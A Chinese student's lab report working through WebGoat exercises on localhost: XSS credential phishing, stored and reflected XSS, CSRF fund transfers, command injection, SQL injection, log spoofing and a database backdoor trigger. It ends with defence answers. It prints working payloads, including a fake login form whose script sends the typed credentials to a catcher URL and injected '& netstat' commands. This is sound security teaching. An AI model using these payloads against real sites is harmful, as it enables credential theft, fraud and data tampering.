实践过程记录
-
下载wegot并配置好java环境后
-
输入
java -jar webgoat-container-7.0-SNAPSHOT-war-exec.jar
-
在浏览器输入localhost:8080/WebGoat,进入WebGoat开始实验
目录
XSS攻击
1.Phishing with XSS (网路钓鱼)
- 在搜索框中输入XSS攻击代码,利用XSS可以在已存在的页面中进一步添加元素的特点。我们先创建一个form,让受害人在我们创建的form中填写用户名和密码,再添加一段JavaScript代码,读取受害人输入的用户名和密码,完整的XSS攻击代码如下:
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
-
在搜索框中输入攻击代码后点击搜索,会看到一个要求输入用户名密码的表单
-
输入用户名密码,点击登录,WebGoat会将你输入的信息捕获并反馈给你
2.Stored XSS Attacks
- 创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容,输入标题,然后在message中输入一串代码,比如
<script>alert("20155230 attack succeed!");</script>
- 提交后,再次点击刚刚创建的帖子,成功弹出窗口,说明攻击成功
3.Reflected XSS Attacks
-
反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。
-
我们将带有攻击性的URL作为输入源,例如依旧输入
<script>alert("20155230 attack succeed!");</script>,就会弹出对话框
CSRF攻击
4.Cross Site Request Forgery(CSRF)
-
查看页面右边Parameters中的src和menu值。
-
我们在message框中输入这样一串代码
<img src='attack?Screen=src值&menu=menu值&transferFunds=转账数额' width='1' height='1'>
-
显示攻击成功
5.CSRF Prompt By-Pass
- message框中输入代码,转走金额5230
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额"> </iframe>
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>
- 转出成功
Sql注入攻击
6.Command Injection
-
这个题是要求能够在目标主机上执行系统命令,我们可以通过火狐浏览器下的一个扩展Firebug(就是右上角的小虫的标志)对源代码进行修改,若无Firebug,可在火狐浏览器添加工具中下载、安装、添加。例如在
BackDoors.help旁边加上"& netstat -an & ipconfig"
-
选中修改后的值再点view,可以看到命令被执行,出现系统网络连接情况:
7.Numeric SQL Injection
-
通过注入SQL字符串的方式查看所有的天气数据,加上一个1=1这种永真式即可达到我们的目的,利用firebug,在任意一个值比如101旁边加上
or 1=1
-
选中Columbia,点Go,可以看到所有天气数据:
8.Log Spoofing
-
我们输入的用户名会被追加到日志文件中,所以我们可以使用障眼法来使用户名为admin的用户在日志中显示“成功登录”,在User Name文本框中输入
20155230%0d%0aLogin Succeeded for username: admin,其中%0d是回车,%0a是换行符:
-
攻击成功
9.String SQL Injection
-
构造SQL注入字符串,在文本框中输入' or 1=1 --:
-
点击GO,可以查看到所以信息:
10.Database Backdoors
-
先输一个101,得到了该用户的信息:
-
可以发现输入的语句没有验证,很容易进行SQL注入,输入注入语句: 101; update employee set salary=5230 ,成功把该用户的工调整到了5230
-
接下来使用语句 101;CREATE TRIGGER lxBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='12345678@qq.com' WHERE userid = NEW.userid 创建一个后门,把表中所有的邮箱和用户ID都改写:
实验后回答问题
-
SQL注入攻击原理,如何防御
- SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。
- 防御措施
- 普通用户与系统管理员用户的权限要有严格的区分。
- 强迫使用参数化语句。
- 加强对用户输入的验证。
-
XSS攻击的原理,如何防御
- XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器
执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列
表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等。 - 防御措施
- 过滤用户输入的检查用户输入的内容中是否有非法内容。如<>(尖括号)、”(引号)、 ‘(单引号)、%(百分比符号)、;(分号)、()(括号)、&(& 符号)、+(加号)等。严格控制输出
- XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器
-
CSRF攻击原理,如何防御
- 跨站请求伪造,盗用身份发送恶意请求。
- 防御措施
- 验证 HTTP Referer 字段
- 在请求地址中添加 token 并验证
实验总结与体会
-
学习到了很多攻击类型,更加深入的了解很多。但是这个软件是英文版本,用起来挺费劲的。
-
在学习sql注入时看源码看的怀疑人生,字是真的有点小,还不知道怎么放大。。。但是在看代码的同时也算是复习了上学期的Web知识。也深深领会到了代码质量的重要性。对XSS和CRSF也有了一定的认识!